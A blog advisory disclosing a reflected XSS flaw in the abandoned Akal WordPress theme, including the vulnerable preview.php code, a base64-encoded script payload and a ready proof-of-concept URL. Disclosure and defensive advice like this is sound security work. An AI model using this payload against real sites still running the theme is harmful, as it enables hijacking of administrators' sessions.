WordPress advisory: Akal premium theme XSS vulnerability & abandonded

Over the course of one week I had the opportunity to audit two hacked WordPress websites. I could quickly discover two vulnerabilities: a Cross Site Scripting, or XSS, in a premium WordPress theme Akal, and a SQL injection Denial-of-Service in a later to be disclosed plugin. This post describes the Akal premium WordPress theme XSS vulnerability.

I have to be honest, I’m not familiar with this theme, it is removed from Themeforest and seems abandoned. Therefore I’m unable to come up with quick fixes or patches as they might break the theme completely.

Akal premium WordPress theme Cross Site Scripting (XSS) vulernability #

The theme Akal is already pulled off from ThemeForst, it looks like the theme author stopped this project. Since no updates are to be expected, my advice is to abandon this theme for your website if you use it.

The theme suffers from a reflected Cross Site Scripting (XSS) vulnerability that would allow an attacker to steal an admin’s cookie, if WordPress wasn’t secured against that type of attacks. Some information on that is available in my prettyPhoto XSS post from May 2014. However, you must be careful for the XSS watering hole-effect.

I thought you might find this interesting:   Block WordPress comment spammers manually

The vulnerable code is located in framework/brad-shortcodes/tinymce/preview.php:

<?php

// loads wordpress
require_once('get_wp.php'); // loads wordpress stuff

// gets shortcode
$shortcode = base64_decode( trim( $_GET['sc'] ) );

?>
[...]
</style>
</head>
<body>
<?php echo do_shortcode( $shortcode ); ?>
</body>
</html>

There are so many wrongs in these few lines of PHP code. One is the contents of get_wp.php (see below) and the other is this code:

$shortcode = base64_decode( trim( $_GET['sc'] ) );

This uses an unvalidated $_GET input directly into a variable $shortcode, and is then used in the WordPress function do_shortcode().

So now I’m interested in the file get_wp.php contents:

<?php

$absolute_path = __FILE__;
$path_to_file = explode( 'wp-content', $absolute_path );
$path_to_wp = $path_to_file[0];

// Access WordPress
require_once( $path_to_wp . '/wp-load.php' );

?>

This simply loads wp-load.php and thus all of WordPress’ code. Without any validation whether the file was included correctly. Meaning you can call it directly in your browser. If needed, always test whether the requested file was included correctly, for example use in your scripts:

if ( ! defined( 'ABSPATH' ) ) {
  exit;
}

Or:

if ( ! defined( 'YOUR_CONSTANT' ) ) {
  exit;
}

And use Nonces in WordPress.

In this particular case, WordPress’ do_shortcode() provides no additional security. In the developers documentation we find the source, and the relevant part is on lines 205 – 207:

if ( false === strpos( $content, '[' ) ) {
  return $content;
}

If no '[' is provided in $content, then simply return $content.

Knowing that, as long as we don’t provide a '[' our XSS payload is returned, we can start attacking it. You must have seen $shortcode = base64_decode( trim( $_GET['sc'] ) );, so our input has to be base64 encoded.

No problem there, just use bash :-) .

After a few tries I came up with the following XSS-payload, that successfully alerted me of the XSS:

echo -n '<script>alert("xss </script%3E")</script>' | base64
PHNjcmlwdD5hbGVydCgieHNzIDwvc2NyaXB0JTNFIik8L3NjcmlwdD4=

PoC URL:

http://example.com/wp-content/themes/akal/framework/brad-shortcodes/tinymce/preview.php?sc=PHNjcmlwdD5hbGVydCgieHNzIDwvc2NyaXB0JTNFIik8L3NjcmlwdD4=

I’ve tried to contact the theme author bradweb but all links are dead ends. I haven’t check for other vulnerabilities in this theme yet.

I thought you might find this interesting:   XSS Vulnerability in Wordfence 6.1.1 to 6.1.6

Looking for a WordPress Plugin Security Testing Cheat Sheet? Ryan Dewhurst created one, use it!

WPScan Vulnerability Database ID: 8607.


Please Support Saotn.org

Each post on Sysadmins of the North takes a significant amount of time to research, write, and edit. Therefore, your donation helps a lot! For example, a donation of $3 U.S. buys me a cup of coffee, and as you know: things jsut work better with coffee. A $10 U.S. donation buys me one month of web hosting (yes, hosting costs money). But seriously, thank you for any amount. Much appreciated!

Please donate to support this site if you found a post interesting or if it helped you solve a problem. Thanks! (Tip: no Paypal account required)

If you appreciated this post, then please donate using this Paypal button


Jan Reilink

My name is Jan. I am not a hacker, coder, developer, programmer or guru. I am merely a system administrator, doing my daily thing at Vevida in the Netherlands. With over 15 years of experience, my specialties include Windows Server, IIS, Linux (CentOS, Debian), security, PHP, websites & optimization.

Leave a Reply

2 Comments on "WordPress advisory: Akal premium theme XSS vulnerability & abandonded"

Hi! Join the discussion, leave a reply!

Sort by:   newest | oldest | most voted
Guest
Guest

Nice work :D

Meryl Glickman
Guest

Do you or any of your followers have a recommendation for another theme to replace this one? My client has this theme and would like to switch. Would love any comments as to whether anyone did this and what they encountered. Note: my website listed is not the site in question; I have a confidentiality agreement and cannot provide the name of the site with the Akai theme. Thank you for your understanding.